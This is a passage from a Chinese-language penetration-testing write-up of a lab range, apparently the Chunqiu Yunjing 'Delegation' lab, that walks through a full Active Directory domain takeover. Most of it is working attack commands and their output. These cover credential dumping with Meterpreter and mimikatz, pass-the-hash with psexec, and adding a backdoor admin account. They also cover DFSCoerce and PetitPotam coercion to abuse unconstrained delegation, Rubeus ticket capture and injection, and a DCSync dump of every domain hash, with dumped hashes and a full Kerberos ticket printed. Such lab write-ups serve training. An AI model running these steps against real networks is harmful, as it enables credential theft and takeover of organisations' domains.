Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::
xianxin:1004:aad3b435b51404eeaad3b435b51404ee:51a52c415264a8fc31520f66f2f50459:::

我们再load kiwicreds_all 一下,获得机器用户的hash,而且发现机器账户WIN19$位于XIAORANG域内

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain    NTLM                              SHA1
--------  ------    ----                              ----
Adrian    WIN19     259745cb123a52aa2e693aaacca2db52  428f78bf42693da2f9f4b4ba537c5f101e275607
WIN19$    XIAORANG  d400f4760988efc4f5e3cd47538710a9  f58455e831225d6848302094b928beadfaa2bb31
WIN19$    XIAORANG  5943c35371c96f19bda7b8e67d041727  5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
matrix$   WIN19     9f12c506328bbee07e9a3f4c1a8fb7de  522a58b4a3f08112273007a218ec89bb7c59bc88

wdigest credentials
===================

Username  Domain    Password
--------  ------    --------
(null)    (null)    (null)
Adrian    WIN19     (null)
WIN19$    XIAORANG  (null)
matrix$   WIN19     (null)

kerberos credentials
====================

Username  Domain        Password
--------  ------        --------
(null)    (null)        (null)
Adrian    WIN19         (null)
WIN19$    xiaorang.lab  f2 1b 81 e5 36 fa 68 dd 1f f6 25 57 7b b0 35 74 79 69 47 fe e8 da e1 b5 ba f8 15 ed b9 65 06 9b 94 e0 8b eb ee 9d d3 3a 47
                         2a 47 a6 7e f9 ca 49 dd 7f 86 d5 d9 54 1b 11 e1 9d 72 76 e0 18 8a 89 b5 0d 1d d3 e0 60 eb 25 db 5f 49 ac 53 25 3c 2f 79 4
                        f 84 28 bf 1c 95 22 fc 7f 17 e8 74 95 fc b5 56 b7 ba 70 2a 0b 8c 69 e9 2b 24 34 4e 7e cf ef 78 1f c1 d3 d3 a8 d7 d5 41 63
                        a2 ac c6 b9 4c ab 51 a4 bd 32 ac 4f a7 c7 25 6c 8c f5 0c 6c 1c ba 03 a4 ea 5b 95 8b 10 51 76 6c ac e4 ac aa 92 f1 27 14 9e
                         b7 18 5e 92 d5 4d e0 8d 26 5c 9d 21 61 c1 ed 57 25 52 a1 4a a1 dc 5d 31 33 ed 95 3a 0c 94 fe 1a ae 6d 5f d6 b4 a8 df 63 2
                        2 3e 7a 0a 7f 36 3e ab 46 00 f9 5d 2f 6c be b2 81 4f e6 bd b1 c0 fe 75 fe 09 42 66 09 fc db 28 e0 15 aa f1 fa
WIN19$    xiaorang.lab  3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d 90 58 52 2a 4e ac bf 05 09 08 06
                         0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 59 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 8
                        4 35 8a 0c 2e 9f d1 90 0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e d3 88 92
                        cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 53 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1
                         0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f 8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a
                        0 cc 5b f4 0e a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e1 d0 1f
matrix$   WIN19         (null)
win19$    XIAORANG.LAB  f2 1b 81 e5 36 fa 68 dd 1f f6 25 57 7b b0 35 74 79 69 47 fe e8 da e1 b5 ba f8 15 ed b9 65 06 9b 94 e0 8b eb ee 9d d3 3a 47
                         2a 47 a6 7e f9 ca 49 dd 7f 86 d5 d9 54 1b 11 e1 9d 72 76 e0 18 8a 89 b5 0d 1d d3 e0 60 eb 25 db 5f 49 ac 53 25 3c 2f 79 4
                        f 84 28 bf 1c 95 22 fc 7f 17 e8 74 95 fc b5 56 b7 ba 70 2a 0b 8c 69 e9 2b 24 34 4e 7e cf ef 78 1f c1 d3 d3 a8 d7 d5 41 63
                        a2 ac c6 b9 4c ab 51 a4 bd 32 ac 4f a7 c7 25 6c 8c f5 0c 6c 1c ba 03 a4 ea 5b 95 8b 10 51 76 6c ac e4 ac aa 92 f1 27 14 9e
                         b7 18 5e 92 d5 4d e0 8d 26 5c 9d 21 61 c1 ed 57 25 52 a1 4a a1 dc 5d 31 33 ed 95 3a 0c 94 fe 1a ae 6d 5f d6 b4 a8 df 63 2
                        2 3e 7a 0a 7f 36 3e ab 46 00 f9 5d 2f 6c be b2 81 4f e6 bd b1 c0 fe 75 fe 09 42 66 09 fc db 28 e0 15 aa f1 fa

注意这里面只有一个机器账号WIN19$在xiaorang.lab,后续域渗透要用它

1
2
3
4
5
6
7
Username  Domain        NTLM                              SHA1
--------  ------        ----                              ----
Adrian    WIN19         259745cb123a52aa2e693aaacca2db52  428f78bf42693da2f9f4b4ba537c5f101e275607
WIN19$    XIAORANG      d400f4760988efc4f5e3cd47538710a9  f58455e831225d6848302094b928beadfaa2bb31
WIN19$    XIAORANG      5943c35371c96f19bda7b8e67d041727  5a4dc280e89974fdec8cf1b2b76399d26f39b8f8
WIN19$    xiaorang.lab  d400f4760988efc4f5e3cd47538710a9
matrix$   WIN19         9f12c506328bbee07e9a3f4c1a8fb7de  522a58b4a3f08112273007a218ec89bb7c59bc88

可以用psexec连接上172.22.4.45,注意Administrator不在xiaorang.lab域内

1
2
3
4
5
6
7
8
9
10
11
proxychains impacket-psexec Administrator@172.22.4.45 -hashes :ba21c629d9fd56aff10c3e826323e6ab -codec gbk

# 或者
use exploit/windows/smb/psexec
set RHOSTS 172.22.4.45
set SMBUser Administrator
set SMBPass 00000000000000000000000000000000:ba21c629d9fd56aff10c3e826323e6ab
set SMBDomain .
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 54526
run

之前没上新用户的话,这时候可以加上

1
2
3
4
5
6
# 创建新用户
net user matrix$ Matrix2025! /add
# 将用户添加至管理员组
net localgroup administrators matrix$ /add
# 用新用户RDP过去
proxychains xfreerdp3 /u:matrix$ /p:Matrix2025! /d:WIN19 /v:172.22.4.45 /cert:ignore

域信息收集

bloodhound

利用工具进行信息收集:bloodhoundAdFind.exe或者Adinfo

mimikatz来hash传递,弹出域用户的管理员终端(SharpHound需要用猕猴桃弹出的域用户终端才能正常使用,这时候才在域内)

1
2
3
mimikatz
privilege::debug
sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:d400f4760988efc4f5e3cd47538710a9

image-20250821003421277

1
SharpHound.exe -c all

BloodHound分析,WIN19 和 DC01 都存在非约束性委托(一般不额外设置的话,DC默认非约束性委派,但是这里WIN19也允许非约束委派),那接下来就是利用非约束性委派。

域渗透之委派攻击全集:https://zhuanlan.zhihu.com/p/549838653?utm_id=0

强制认证有好几种方式:https://forum.butian.net/share/1944

image-20250821015702721

AdFind

或者上传AdFind.exe,发现WIN19机器账户被配置了非约束委派

1
AdFind.exe -b "DC=XIAORANG,DC=LAB" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

image-20250821005410358

非约束委派

发现非约束委派,,那么只要域控来访问我们的服务,就会在我们本地的lsass进程中缓存目标的TGT。

这个时候就需要强制域控来进行访问了,需要利用到DFSCoerce:https://github.com/Wh04m1001/DFSCoerce;或者PetitPotam:https://github.com/topotam/PetitPotam

上传一个Rubeus(注意版本 ,需要管理员权限),监控来自DC的TGT

1
Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

用dfscoerce触发rpc使dc向WIN19访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
proxychains python3 dfscoerce.py -u WIN19$ -hashes :d400f4760988efc4f5e3cd47538710a9 -d xiaorang.lab win19 172.22.4.7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[-] Connecting to ncacn_np:172.22.4.7[\PIPE\netdfs]
[proxychains] Strict chain  ...  127.0.0.1:55556  ...  172.22.4.7:445  ...  OK
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot 
ServerName:                      'win19\x00' 
RootShare:                       'test\x00' 
ApiFlags:                        1 
DFSNM SessionError: code: 0x490 - ERROR_NOT_FOUND - Element not found.

或者
proxychains python3 PetitPotam.py -u 'WIN19$' -hashes :2c05ad434d747b203a57565194891b38 -d xiaorang.lab -dc-ip 172.22.4.7 WIN19.xiaorang.lab DC01.xiaorang.lab

返回Rubeus,接收到了来自域控的TGT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
C:\Users\matrix$>Rubeus.exe monitor /interval:1 /nowrap /targetuser:DC01$

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: TGT Monitoring
[*] Target user     : DC01$
[*] Monitoring every 1 seconds for new TGTs


[*] 2025/8/20 15:26:37 UTC - Found new TGT:

  User                  :  DC01$@XIAORANG.LAB
  StartTime             :  2025/8/20 18:37:26
  EndTime               :  2025/8/21 4:37:26
  RenewTill             :  2025/8/27 18:37:26
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6oaSST1F8BfRVPkMevSehGLy90gckufUpRwrRze8btpbakNSnl5d2V/SN4/mgL+UO7hSNmxCgDWo8mki+w6xz5qVNWbc/7Pt/Dyod0ryntnn+EvQydBDmwybHv28Z3nDqUs7EforDyVHEXS40llOp/ZWlud8ogwZIZkOQIVAAfsmgDgGhSPGKC/GAW9AxFaCoks24qjVJk3fYGV3NIHAxz/8F5TeeFKljjN6hwckAc6mZgEZ/2aQtttxyVU0Fi9eDTkSvPzEDaVM6v4TsXl1FP1j4h/Ib0RLYBc4JXoyw5DCCiMQSif49xSTqMqFvlsbEgHpXNeedyaMJfQANL16RX+27YJF2xaRfpZ8pPFV/Hwjqjm/q9T1sje85I0ojueA//rhdy1CqnGiEUMaidTM7f/1IEJjK0qgFjjY5ltf2ZamOkYJdqGtfK3fXBbn/nEq8+qoPM0PJOTNTjqryPu3xQyuKzSTlH3zT62F2+1FG6ux2CQst1xWd4SX0vGZrsuFb/BG24O5tePlkGosxpqG8wH6TbkTQheWA88ITO7KNl7VolZZRDXowRFMUeQIm6btAVIL8qDxsj/s0MlVXWlFhK6WnkVkL9ylFVaPkqtUEEku2D6HOR806e+W+X7QUSEvLSJpCTGyTHZDuzF1U3EPHDWqAkhFLs/b3TFLjVHq0s9zwXFvk9Ls5U1yAxvMhmn8Xa6Z4a+UTqhhNhszq3NZLaY2dSG6hZqyA4r+lDg7ZOU3InLH4BjhfuXW66/r7529gBl0MBT/2DPv+DD8+BWMjy0wKVlyKcRZEEjryMVvs2srY8KOXDCdsIF98sc54EmigDxjpaRRS5spcZcBAoEftNT1Lwc8kYSeA1HCxzGW/V0LQSpL76GV0JNi0UpD2V3pxo08G1Uk78sLfQbZ+Hy5kRHf55GjsT3sJx0RsMxIW6I7Kwvx1q/yIIqFVOkobh679b7El3pYNH7fEHpBp7RsxKacpfnDWzRdCeExKnG8/uD6fGKCFw1oWjtzN3LzdafxMFV0f+WIc4nhGZDO7g3+hYk4MHtPnOAhnvePJu0vfWxtR8aF4iZ/qfhHwcHHJ5Ty3HrIy2PkN2NHhJbeAXzIFqSBn6nRCuPim4ACCcYfVwPCO9U6I9zXepZmfdkcP6INsyzgaK47NQtyXs0foBC5/fh/Trob9RxywyYuQd+a025REVdGnSV58s7sJrYSqAk3joisZCIR19seNtsQ8P9DiUt8Qy65YCuBibAz67qcdRi6iCwLFhESQNydheniOVzIofafTPzTmaX35AZASJvxTQmHKbLI+Kn4yKtc09hs5TASNCXuL8CbdGX2FuFpCqt95aqH58KY0H8hQ/QHBCLaUvIAd5efzaFYrZdxTqFLVlwi+89pthA5+copcpjBdUox7V/ud8QjrsZan0TFmc0Tu675q/0nlRC26dtzNUFWOjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCiB6CLXr1qXSV3HgdOALm+eSs9Tt+CssBM8e0cRiBCR6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDgyMDEwMzcyNlqmERgPMjAyNTA4MjAyMDM3MjZapxEYDzIwMjUwODI3MTAzNzI2WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

[*] Ticket cache size:

票据注入,命令如下

1
Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6oaSST1F8BfRVPkMevSehGLy90gckufUpRwrRze8btpbakNSnl5d2V/SN4/mgL+UO7hSNmxCgDWo8mki+w6xz5qVNWbc/7Pt/Dyod0ryntnn+EvQydBDmwybHv28Z3nDqUs7EforDyVHEXS40llOp/ZWlud8ogwZIZkOQIVAAfsmgDgGhSPGKC/GAW9AxFaCoks24qjVJk3fYGV3NIHAxz/8F5TeeFKljjN6hwckAc6mZgEZ/2aQtttxyVU0Fi9eDTkSvPzEDaVM6v4TsXl1FP1j4h/Ib0RLYBc4JXoyw5DCCiMQSif49xSTqMqFvlsbEgHpXNeedyaMJfQANL16RX+27YJF2xaRfpZ8pPFV/Hwjqjm/q9T1sje85I0ojueA//rhdy1CqnGiEUMaidTM7f/1IEJjK0qgFjjY5ltf2ZamOkYJdqGtfK3fXBbn/nEq8+qoPM0PJOTNTjqryPu3xQyuKzSTlH3zT62F2+1FG6ux2CQst1xWd4SX0vGZrsuFb/BG24O5tePlkGosxpqG8wH6TbkTQheWA88ITO7KNl7VolZZRDXowRFMUeQIm6btAVIL8qDxsj/s0MlVXWlFhK6WnkVkL9ylFVaPkqtUEEku2D6HOR806e+W+X7QUSEvLSJpCTGyTHZDuzF1U3EPHDWqAkhFLs/b3TFLjVHq0s9zwXFvk9Ls5U1yAxvMhmn8Xa6Z4a+UTqhhNhszq3NZLaY2dSG6hZqyA4r+lDg7ZOU3InLH4BjhfuXW66/r7529gBl0MBT/2DPv+DD8+BWMjy0wKVlyKcRZEEjryMVvs2srY8KOXDCdsIF98sc54EmigDxjpaRRS5spcZcBAoEftNT1Lwc8kYSeA1HCxzGW/V0LQSpL76GV0JNi0UpD2V3pxo08G1Uk78sLfQbZ+Hy5kRHf55GjsT3sJx0RsMxIW6I7Kwvx1q/yIIqFVOkobh679b7El3pYNH7fEHpBp7RsxKacpfnDWzRdCeExKnG8/uD6fGKCFw1oWjtzN3LzdafxMFV0f+WIc4nhGZDO7g3+hYk4MHtPnOAhnvePJu0vfWxtR8aF4iZ/qfhHwcHHJ5Ty3HrIy2PkN2NHhJbeAXzIFqSBn6nRCuPim4ACCcYfVwPCO9U6I9zXepZmfdkcP6INsyzgaK47NQtyXs0foBC5/fh/Trob9RxywyYuQd+a025REVdGnSV58s7sJrYSqAk3joisZCIR19seNtsQ8P9DiUt8Qy65YCuBibAz67qcdRi6iCwLFhESQNydheniOVzIofafTPzTmaX35AZASJvxTQmHKbLI+Kn4yKtc09hs5TASNCXuL8CbdGX2FuFpCqt95aqH58KY0H8hQ/QHBCLaUvIAd5efzaFYrZdxTqFLVlwi+89pthA5+copcpjBdUox7V/ud8QjrsZan0TFmc0Tu675q/0nlRC26dtzNUFWOjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCiB6CLXr1qXSV3HgdOALm+eSs9Tt+CssBM8e0cRiBCR6EOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDgyMDEwMzcyNlqmERgPMjAyNTA4MjAyMDM3MjZapxEYDzIwMjUwODI3MTAzNzI2WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9SQU5HLkxBQg==

因为dc拥有dcsync的权限,所以直接可以获取域内所有的hash。

成功拿到域管hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# 不行,可能是msf没导入ptt?
kiwi_cmd "privilege::debug"
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
# 行
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
C:\Users\matrix$>mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  767e06b9c74fd628dd13785006a9092b        514
1105    Aldrich 98ce19dd5ce74f670d230c7b1aa016d0        512
1106    Marcus  b91c7cc463735bf0e599a2d0a04df110        512
1112    WIN-3X7U15C2XDM$        c3ddf0ffd17c48e6c40e6eda9c9fbaf7        4096
1113    WIN-YUUAW2QG9MF$        125d0e9790105be68deb6002690fc91b        4096
1000    DC01$   5fe1c30795fa9a33a5f28cf3a5cf5e04        532480
500     Administrator   4889f6553239ace1f7c47fa2c619c252        512
1103    FILESERVER$     3263bd33c8b76b09b059275a487ea908        4096
1104    WIN19$  d400f4760988efc4f5e3cd47538710a9        528384

mimikatz(commandline) # exit
Bye!

连接172.22.4.19,拿到flag03

在 FILESERVER 上发现了域管的 session,感觉正常步骤好像应该是先拿 FILESERVER 导出域管密码然后再拿下域控?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
proxychains impacket-psexec xiaorang/Administrator@172.22.4.19 -hashes :4889f6553239ace1f7c47fa2c619c252 -codec gbk
type C:\Users\Administrator\flag\flag03.txt
   . .       . .       .         . .       . .       . .       . .    .    .       . .       . .    
.+'|=|`+. .+'|=|`+. .+'|      .+'|=|`+. .+'|=|`+. .+'|=|`+. .+'|=|`+.=|`+. |`+. .+'|=|`+. .+'|=|`+. 
|  | `+ | |  | `+.| |  |      |  | `+.| |  | `+.| |  | |  | |.+' |  | `+.| |  | |  | |  | |  | `+ | 
|  |  | | |  |=|`.  |  |      |  |=|`.  |  | .    |  |=|  |      |  |      |  | |  | |  | |  |  | | 
|  |  | | |  | `.|  |  |      |  | `.|  |  | |`+. |  | |  |      |  |      |  | |  | |  | |  |  | | 
|  |  | | |  |    . |  |    . |  |    . |  | `. | |  | |  |      |  |      |  | |  | |  | |  |  | | 
|  | .+ | |  | .+'| |  | .+'| |  | .+'| |  | .+ | |  | |  |      |  |      |  | |  | |  | |  |  | | 
`+.|=|.+' `+.|=|.+' `+.|=|.+' `+.|=|.+' `+.|=|.+' `+.| |..|      |.+'      |.+' `+.|=|.+' `+.|  |.| 



flag03: flag{ca959c0c-bc71-4b13-b7d4-98e3f0cd8578}


Here is fileserver.xiaorang.lab, you might find something interesting on this host that can help you!

连接dc,拿到flag04

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
proxychains impacket-psexec xiaorang/Administrator@172.22.4.7 -hashes :4889f6553239ace1f7c47fa2c619c252 -codec gbk
type C:\Users\Administrator\flag\flag04.txt
 ______   _______  _        _______  _______  _______ __________________ _______  _       
(  __  \ (  ____ \( \      (  ____ \(  ____ \(  ___  )\__   __/\__   __/(  ___  )( (    /|
| (  \  )| (    \/| (      | (    \/| (    \/| (   ) |   ) (      ) (   | (   ) ||  \  ( |
| |   ) || (__    | |      | (__    | |      | (___) |   | |      | |   | |   | ||   \ | |
| |   | ||  __)   | |      |  __)   | | ____ |  ___  |   | |      | |   | |   | || (\ \) |
| |   ) || (      | |      | (      | | \_  )| (   ) |   | |      | |   | |   | || | \   |
| (__/  )| (____/\| (____/\| (____/\| (___) || )   ( |   | |   ___) (___| (___) || )  \  |
(______/ (_______/(_______/(_______/(_______)|/     \|   )_(   \_______/(_______)|/    )_)


Awesome! Now you have taken over the entire domain network.


flag04: flag{d798003d-0c82-4e38-aa1c-dbd024c13dfc}
PenTest
#春秋云镜
春秋云镜 Delegation
http://example.com/2026/test52/
作者
sangnigege
发布于
2026年4月15日
许可协议